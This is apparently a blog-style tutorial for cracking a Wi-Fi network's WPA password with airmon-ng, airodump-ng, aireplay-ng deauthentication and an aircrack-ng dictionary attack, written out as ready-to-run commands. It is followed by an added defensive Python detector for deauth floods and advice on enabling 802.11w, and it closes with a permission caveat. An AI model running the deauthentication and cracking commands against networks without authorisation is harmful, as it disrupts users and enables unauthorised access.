You’ll need
- Backtrack with metasploit
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
Verify your wireless interface is up, then put it into monitor mode and start scanning:
airmon-ng start wlan0
airodump-ng mon0
Find the BSSID (MAC address) of the network that will be your TOE (target of evaluation).
Stop airodump-ng (^C).
Note the BSSID and channel; both go into the command below.
Type
airodump-ng -w MyFile -c 1 --bssid MA:CA:DD:RE:SS mon0
While that is running, open a second terminal session and run
aireplay-ng -0 <count> -a MA:CA:DD:RE:SS mon0
to send deauthentication frames.
After about 30 seconds, ^C out.
Go back to your first terminal session. About a minute should have passed.
^C out of airodump-ng.
Now run a dictionary attack against the MyFile capture you created.
Type
aircrack-ng MyFile-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
Now we wait. If the password is weak, chances are it will be cracked here and shown to you.
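The deauthentication step above works because, on a network without 802.11w (Protected Management Frames), deauth frames are unauthenticated, so any station can send them. The same property makes the burst easy to spot on the defending side: dozens of deauth frames for one BSSID inside a couple of seconds is not normal client churn. The following script is an added example, not part of the original post and not part of the aircrack-ng suite. It parses raw 802.11 management frames (no radiotap header, no FCS) into a small record, then runs a sliding-window counter that alerts when a single BSSID sees a burst of deauth/disassoc frames. The MAC addresses, timestamps, threshold and window length are all constructed sample values, and `build_deauth` exists only to fabricate the in-memory sample capture that the detector is run over.

```python
"""Detect 802.11 deauthentication floods in a stream of captured frames.

Added example (not from the original post): parses raw management frames
and flags a BSSID that receives a burst of deauth/disassoc frames, the
traffic pattern a deauth attack produces. All addresses and timestamps
below are constructed sample data.
"""
import struct
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Optional

FTYPE_MGMT = 0
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class MgmtFrame:
    ts: float              # capture timestamp, seconds
    subtype: int
    da: str                # addr1, destination
    sa: str                # addr2, source
    bssid: str             # addr3
    reason: Optional[int]  # reason code for deauth/disassoc, else None


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def parse_mgmt_frame(ts: float, raw: bytes) -> Optional[MgmtFrame]:
    """Parse a raw 802.11 frame. Returns None for non-management frames."""
    if len(raw) < 24:
        raise ValueError("frame shorter than the 24-byte 802.11 MAC header")
    fc0 = raw[0]                     # frame control: type in bits 2-3, subtype in bits 4-7
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    if ftype != FTYPE_MGMT:
        return None
    da, sa, bssid = mac_str(raw[4:10]), mac_str(raw[10:16]), mac_str(raw[16:22])
    reason = None
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(raw) >= 26:
        reason = struct.unpack_from("<H", raw, 24)[0]   # little-endian reason code
    return MgmtFrame(ts, subtype, da, sa, bssid, reason)


def build_deauth(da: str, sa: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """Construct an in-memory deauth frame; used only to fabricate sample input."""
    fc = bytes([(FTYPE_MGMT << 2) | (SUBTYPE_DEAUTH << 4), 0x00])
    header = (fc + struct.pack("<H", 0) + mac_bytes(da) + mac_bytes(sa)
              + mac_bytes(bssid) + struct.pack("<H", seq << 4))  # seq number in high 12 bits
    return header + struct.pack("<H", reason)


class DeauthFloodDetector:
    """Alert when one BSSID sees >= threshold deauth/disassoc frames within `window` seconds."""

    def __init__(self, threshold: int = 10, window: float = 5.0):
        self.threshold = threshold
        self.window = window
        self._events = defaultdict(deque)   # bssid -> timestamps inside the window
        self.alerts = []

    def feed(self, frame: MgmtFrame) -> Optional[dict]:
        if frame.subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None
        q = self._events[frame.bssid]
        q.append(frame.ts)
        while q and frame.ts - q[0] > self.window:
            q.popleft()
        if len(q) == self.threshold:        # fire once, when the count first crosses the line
            alert = {"bssid": frame.bssid, "count": len(q), "first_ts": q[0],
                     "last_ts": frame.ts, "reason": frame.reason}
            self.alerts.append(alert)
            return alert
        return None


def sample_capture() -> list:
    """Constructed capture: one AP with normal client churn, one AP under a deauth burst."""
    quiet_ap, target_ap, client = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "de:ad:be:ef:00:01"
    frames = []
    for i, ts in enumerate([0.0, 45.0, 110.0]):          # genuine deauths, spread over two minutes
        frames.append((ts, build_deauth(quiet_ap, client, quiet_ap, reason=3, seq=i)))
    for i in range(64):                                  # 64 broadcast deauths in ~1.6 s
        frames.append((60.0 + i * 0.025, build_deauth(BROADCAST, target_ap, target_ap, reason=7, seq=i)))
    frames.sort(key=lambda x: x[0])
    return frames


def run_detector(frames, threshold: int = 10, window: float = 5.0) -> list:
    det = DeauthFloodDetector(threshold, window)
    for ts, raw in frames:
        f = parse_mgmt_frame(ts, raw)
        if f is not None:
            det.feed(f)
    return det.alerts


if __name__ == "__main__":
    for a in run_detector(sample_capture()):
        print(f"deauth flood: bssid={a['bssid']} count={a['count']} "
              f"window={a['first_ts']:.2f}-{a['last_ts']:.2f}s reason={a['reason']}")
```

The threshold and window are deliberately simple; in practice you would tune them per site, key on the attacking source address as well as the BSSID, and treat broadcast-destination deauths as higher severity, since a real AP rarely deauthenticates everyone at once. Enabling 802.11w on the AP removes the root cause, because stations then discard unprotected deauth frames.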
Perform this on your own network or on a network you have written permission to try it on.
Here is a video that shows exactly the steps above.